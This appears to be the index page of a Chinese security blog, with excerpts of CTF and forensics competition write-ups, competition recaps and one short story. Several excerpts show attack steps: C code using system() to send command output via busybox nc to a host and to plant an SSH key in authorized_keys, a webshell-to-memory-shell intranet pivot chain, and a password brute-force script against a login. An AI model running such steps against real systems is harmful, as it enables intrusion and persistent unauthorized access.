St4rr's Blog

不会的还是太多了，根据网上佬们的wp好好复现一下吧 （又来吃百家饭了） 手机取证 1 分析手机镜像，请问机身的Wi-Fi 信号源的物理地址是什么？[标准格式:01:02:03:04:05:06] 在/misc/wifi/WifiConfigStore.xml中可找到 img 00:db:60:6e:86:13 2 分析手机镜像，请问张大的手机号码尾号是3807的手机号码是多少？[标准格式：15599005009] 全局搜索 img 15680193807 3 分析手机镜像，分析手机镜像，其通讯录中号码归属地最多的直辖市是哪里？[标准格式：天津市] 排个序不难发现明显北京市最多 img 北京市 4 分析手机镜像，嫌疑人最近卸载过的的一款小说APP的名字是什么？[标准格式：com.tencent.mm] 查看包的缓存/system/package_cache/1，找到有个com.kmxs.reader未在APP列表中出现 img img 七猫免费小说 5 分析手机镜像，嫌 ...

又是拖队友后腿的一集，给磕了orzorzorz 现在根据网上有的一些答案复现一下吧，以及记录一些题我的做法，争取下次不再拖后腿了orzorzorz 由于至今不会逆向，“ APK程序分析 ”“ 二进制程序分析”两部分就不复现了（（ “数据分析”部分也不复现了，做这部分题全靠AI（ 服务器取证 重建服务器集群 将四个镜像分别仿真起来，然后配到192.168.50.*的网段下 img 查看所有pod img 访问kubernetes的dashboard img 1kubectl create token dashboard-admin --namespace kube-system 获取到token，登录进去，看到pods是有问题的状态 img 去第四台机器上关一下防火墙 1systemctl stop firewalld redis活了 img master上有mysql80的配置文件，可从中得知存储目录叫mysql80 img 可以在第四台机器上通过暴力搜索mysq ...

先简述一下出题时的攻击流程 环境中共有三台机器：一台 Windows 10、一台 Windows 7 和一台 Windows Server 2019，三者位于同一内网中。其中，Windows Server 2019 作为域控制器，部署了 Active Directory 域服务，并配置了域名 0xgaammee.com。Windows 7 计算机已加入该域，而 Windows 10 计算机未加入域。 Windows 10上通过phpstudy部署有存在漏洞的CraftCMS web服务，黑客利用漏洞写入了木马控制了该机器，并获取到了用户名字典和密码字典。而后黑客搭建了frp，利用得到的字典对域进行了密码喷洒攻击。 附件中的1.E01即Windows 10的磁盘镜像，1.pcapng为密码喷洒时从Windows 7上抓取到的流量包。 有很多各种各样方便快捷的软件可用于磁盘取证，这里为了更好地理解原理，使用朴实无华的FTK Manager工具。 1 被攻陷的机器中，用户0xGame的明文密码是？ 在C:\Windows\System32\config下找 ...

Sysadmin 访问过去是个上传的页面，能够编译运行C语言源文件，查看网页源码注释里给出了编译用的命令 img 从命令中看出禁止了从外部链接库，所以要用system函数得自己定义一下。简单尝试后发现很多常用命令没有，但是有busybox用。先搞到当前用户名 12345int system(const char *command);int main() { system("echo $(whoami) | busybox nc 192.168.56.1 23333"); return 0;} img 然后写公钥进去，在本地起个服务wget进去 12345int system(const char *command);int main() { system("mkdir -p ~/.ssh && touch ~/.ssh/authorized_keys && busybox wget 192.168.56.1:8000/id_rsa.pub ...

先扫一波，扫到一个nday img 写马进去 img 蚁剑连上，拿到第一个flag img 传fscan扫内网 img 搭建frp img img 前面扫到有一台机器有heapdump泄露，访问172.28.23.33:8080/actuator/heapdump下载下来，然后用JDumpSpider获取key img shiro attack写哥斯拉的内存马进去 img 哥斯拉连上，是一个低权限用户 img 先看下网络状态，看到在59696端口跑了个服务 img 切到/home/ops01底下，有个HashNote附件，看来是个pwn题。一点不懂pwn，直接抄作业 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071 ...

恐怖本科组，恐怖凌晨战（（ 但是没想到竟然混进线下了:) ban完从第26变成第13了() 不过没想到线下比赛也是各种抽象事件频出，最终线下当了个三等奖守门员，差点被恐怖的觉醒之力打败了（（ 初赛Writeup点我 决赛Writeup点我

用rockyou.txt爆破后台密码，用户名为administrator 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980import requestsimport json# Define the target URL and headers based on the provided HTTP requesturl = "http://39.99.145.57/login"headers = { "Host": "39.99.145.57", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/ ...

被学校里的老师N层委派来打了这个比赛（（ 好久没有这样打这种个人赛了，一个人打五个方向知识有限真的吃力（ 好在很多题目还是比较基础的，也是混上了一个学生组三等奖 :) 可惜后面团体赛我们阵营输了，我们队伍没拿上奖 :( 感觉还是得多练练渗透了（ Crypto vigenere_server 题目 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104#!/usr/bin/env python3# -*- coding: utf-8 -*-import osimport socketimport threading# ---------------- 可见 ASCII 94 字符表 ----------------# ...

​ 秋深了，枫叶如血，一片片坠落在青石阶上，像被风撕碎的旧信笺。山间古寺静谧，檐角悬着铜铃，偶有风过，便发出几声清冷的颤音。 ​ 寺后有一园，名“松雪”，传为百年前一位制瓷大家所建。园中植松数株，枝干虬曲，雪松落针成毯，覆于泥土之上，年复一年，腐化为泥，滋养着地底沉睡的瓷土。园心一亭，名“澄怀”，亭中常坐一人，着素麻长衫，手执刻刀，在一方未烧之坯上细细雕琢。 ​ 此人姓林，名砚舟，世人称他“松雪先生”。他并非生来便是大师。十年前，他曾是个在园外徘徊的少年，衣衫粗劣，眼神怯懦，只因偶然拾得一块残瓷，慕名而来，叩响寺门。那时，是另一个人收留了他——老匠人沈观白。 ​ 沈观白不善言辞，却极重技艺。他教林砚舟辨土、揉泥、拉坯、施釉、刻纹，乃至火候的呼吸节奏。他常说：“瓷是有魂的，它记得每一双手的温度。”那些年，林砚舟日日跪坐泥前，十指皴裂，指甲缝里嵌着洗不去的陶尘。沈观白从不催促，只在他失误时轻轻摇头，再示范一次。 ​ 十年光阴，林砚舟终于烧出第一件“雪胎青”——釉色如初雪覆于冰肌，光线下流转幽蓝，似有月华凝于其上。世人惊为天工，争相传颂。而沈观白只是伫立窑前，目光沉静地抚过 ...

仍然是跟校队打的，成功进线下 这个九月要到处奔波咯 :) 初赛Writeup点我 决赛实在是难绷，开局就把自己的电脑整废了，没错我就是这次的小丑之一() 后来拿队友的电脑打，做了两个题，好歹也算是有所贡献了( 又是差一点点拿到人才证书，还是太菜了((